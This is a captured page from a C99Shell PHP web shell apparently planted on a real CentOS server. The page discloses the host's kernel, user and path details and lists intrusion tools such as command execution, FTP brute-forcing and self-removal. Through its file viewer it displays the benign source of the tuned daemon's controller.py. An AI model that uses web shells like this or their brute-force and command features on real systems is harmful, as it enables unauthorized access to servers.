!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/usr/lib/python2.7/site-packages/tuned/daemon/   drwxr-xr-x
Free 9.17 GB of 93.48 GB (9.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     controller.py (8.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
from tuned import exports
import tuned.logs
import tuned.exceptions
from tuned.exceptions import TunedException
import threading
import tuned.consts as consts
from tuned.utils.commands import commands
from tuned.utils.profile_recommender import ProfileRecommender

__all__ = ["Controller"]

log = tuned.logs.get()

class TimerStore(object):
    def __init__(self):
        self._timers = dict()
        self._timers_lock = threading.Lock()

    def store_timer(self, token, timer):
        with self._timers_lock:
            self._timers[token] = timer

    def drop_timer(self, token):
        with self._timers_lock:
            try:
                timer = self._timers[token]
                timer.cancel()
                del self._timers[token]
            except:
                pass

    def cancel_all(self):
        with self._timers_lock:
            for timer in self._timers.values():
                timer.cancel()
            self._timers.clear()

class Controller(tuned.exports.interfaces.ExportableInterface):
    """
    Controller's purpose is to keep the program running, start/stop the tuning,
    and export the controller interface (currently only over D-Bus).
    """

    def __init__(self, daemon, global_config):
        super(Controller, self).__init__()
        self._daemon = daemon
        self._global_config = global_config
        self._terminate = threading.Event()
        self._cmd = commands()
        self._timer_store = TimerStore()

    def run(self):
        """
        Controller main loop. The call is blocking.
        """
        log.info("starting controller")
        res = self.start()
        daemon = self._global_config.get_bool(consts.CFG_DAEMON, consts.CFG_DEF_DAEMON)
        if not res and daemon:
            exports.start()

        if daemon:
            self._terminate.clear()
            # we have to pass some timeout, otherwise signals will not work
            while not self._cmd.wait(self._terminate, 3600):
                pass

        log.info("terminating controller")
        self.stop()

    def terminate(self):
        self._terminate.set()

    @exports.signal("sbs")
    def profile_changed(self, profile_name, result, errstr):
        pass

    # exports decorator checks the authorization (currently through polkit), caller is None if
    # no authorization was performed (i.e. the call should process as authorized), string
    # identifying caller (with DBus it's the caller bus name) if authorized and empty
    # string if not authorized, caller must be the last argument

    def _log_capture_abort(self, token):
        tuned.logs.log_capture_finish(token)
        self._timer_store.drop_timer(token)

    @exports.export("ii", "s")
    def log_capture_start(self, log_level, timeout, caller = None):
        if caller == "":
            return ""
        token = tuned.logs.log_capture_start(log_level)
        if token is None:
            return ""
        if timeout > 0:
            timer = threading.Timer(timeout,
                    self._log_capture_abort, args = [token])
            self._timer_store.store_timer(token, timer)
            timer.start()
        return "" if token is None else token

    @exports.export("s", "s")
    def log_capture_finish(self, token, caller = None):
        if caller == "":
            return ""
        res = tuned.logs.log_capture_finish(token)
        self._timer_store.drop_timer(token)
        return "" if res is None else res

    @exports.export("", "b")
    def start(self, caller = None):
        if caller == "":
            return False
        if self._global_config.get_bool(consts.CFG_DAEMON, consts.CFG_DEF_DAEMON):
            if self._daemon.is_running():
                return True
            elif not self._daemon.is_enabled():
                return False
        return self._daemon.start()

    @exports.export("", "b")
    def stop(self, caller = None):
        if caller == "":
            return False
        if not self._daemon.is_running():
            res = True
        else:
            res = self._daemon.stop()
        self._timer_store.cancel_all()
        return res

    @exports.export("", "b")
    def reload(self, caller = None):
        if caller == "":
            return False
        if self._daemon.is_running():
            stop_ok = self.stop()
            if not stop_ok:
                return False
        try:
            self._daemon.reload_profile_config()
        except TunedException as e:
            log.error("Failed to reload Tuned: %s" % e)
            return False
        return self.start()

    def _switch_profile(self, profile_name, manual):
        was_running = self._daemon.is_running()
        msg = "OK"
        success = True
        reapply = False
        try:
            if was_running:
                self._daemon.stop(profile_switch = True)
            self._daemon.set_profile(profile_name, manual)
        except tuned.exceptions.TunedException as e:
            success = False
            msg = str(e)
            if was_running and self._daemon.profile.name == profile_name:
                log.error("Failed to reapply profile '%s'. Did it change on disk and break?" % profile_name)
                reapply = True
            else:
                log.error("Failed to apply profile '%s'" % profile_name)
        finally:
            if was_running:
                if reapply:
                    log.warn("Applying previously applied (possibly out-dated) profile '%s'." % profile_name)
                elif not success:
                    log.info("Applying previously applied profile.")
                self._daemon.start()

        return (success, msg)

    @exports.export("s", "(bs)")
    def switch_profile(self, profile_name, caller = None):
        if caller == "":
            return (False, "Unauthorized")
        return self._switch_profile(profile_name, True)

    @exports.export("", "(bs)")
    def auto_profile(self, caller = None):
        if caller == "":
            return (False, "Unauthorized")
        profile_name = self.recommend_profile()
        return self._switch_profile(profile_name, False)

    @exports.export("", "s")
    def active_profile(self, caller = None):
        if caller == "":
            return ""
        if self._daemon.profile is not None:
            return self._daemon.profile.name
        else:
            return ""

    @exports.export("", "(ss)")
    def profile_mode(self, caller = None):
        if caller == "":
            return "unknown", "Unauthorized"
        manual = self._daemon.manual
        if manual is None:
            # This means no profile is applied. Check the preset value.
            try:
                profile, manual = self._cmd.get_active_profile()
                if manual is None:
                    manual = profile is not None
            except TunedException as e:
                mode = "unknown"
                error = str(e)
                return mode, error
        mode = consts.ACTIVE_PROFILE_MANUAL if manual else consts.ACTIVE_PROFILE_AUTO
        return mode, ""

    @exports.export("", "b")
    def disable(self, caller = None):
        if caller == "":
            return False
        if self._daemon.is_running():
            self._daemon.stop()
        if self._daemon.is_enabled():
            self._daemon.set_profile(None, True, save_instantly=True)
        return True

    @exports.export("", "b")
    def is_running(self, caller = None):
        if caller == "":
            return False
        return self._daemon.is_running()

    @exports.export("", "as")
    def profiles(self, caller = None):
        if caller == "":
            return []
        return self._daemon.profile_loader.profile_locator.get_known_names()

    @exports.export("", "a(ss)")
    def profiles2(self, caller = None):
        if caller == "":
            return []
        return self._daemon.profile_loader.profile_locator.get_known_names_summary()

    @exports.export("s", "(bsss)")
    def profile_info(self, profile_name, caller = None):
        if caller == "":
            return tuple(False, "", "", "")
        if profile_name is None or profile_name == "":
            profile_name = self.active_profile()
        return tuple(self._daemon.profile_loader.profile_locator.get_profile_attrs(profile_name, [consts.PROFILE_ATTR_SUMMARY, consts.PROFILE_ATTR_DESCRIPTION], [""]))

    @exports.export("", "s")
    def recommend_profile(self, caller = None):
        if caller == "":
            return ""
        return ProfileRecommender().recommend(hardcoded = not self._global_config.get_bool(consts.CFG_RECOMMEND_COMMAND, consts.CFG_DEF_RECOMMEND_COMMAND))

    @exports.export("", "b")
    def verify_profile(self, caller = None):
        if caller == "":
            return False
        return self._daemon.verify_profile(ignore_missing = False)

    @exports.export("", "b")
    def verify_profile_ignore_missing(self, caller = None):
        if caller == "":
            return False
        return self._daemon.verify_profile(ignore_missing = True)

    @exports.export("", "a{sa{ss}}")
    def get_all_plugins(self, caller = None):
        """Return dictionary with accesible plugins

        Return:
        dictionary -- {plugin_name: {parameter_name: default_value}}
        """
        if caller == "":
            return False
        plugins = {}
        for plugin_class in self._daemon.get_all_plugins():
            plugin_name = plugin_class.__module__.split(".")[-1].split("_", 1)[1]
            conf_options = plugin_class._get_config_options()
            plugins[plugin_name] = {}
            for key, val in conf_options.items():
                plugins[plugin_name][key] = str(val)
        return plugins

    @exports.export("s","s")
    def get_plugin_documentation(self, plugin_name, caller = None):
        """Return docstring of plugin's class"""
        if caller == "":
            return False
        return self._daemon.get_plugin_documentation(str(plugin_name))

    @exports.export("s","a{ss}")
    def get_plugin_hints(self, plugin_name, caller = None):
        """Return dictionary with plugin's parameters and their hints

        Parameters:
        plugin_name -- name of plugin

        Return:
        dictionary -- {parameter_name: hint}
        """
        if caller == "":
            return False
        return self._daemon.get_plugin_hints(str(plugin_name))

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0043 ]--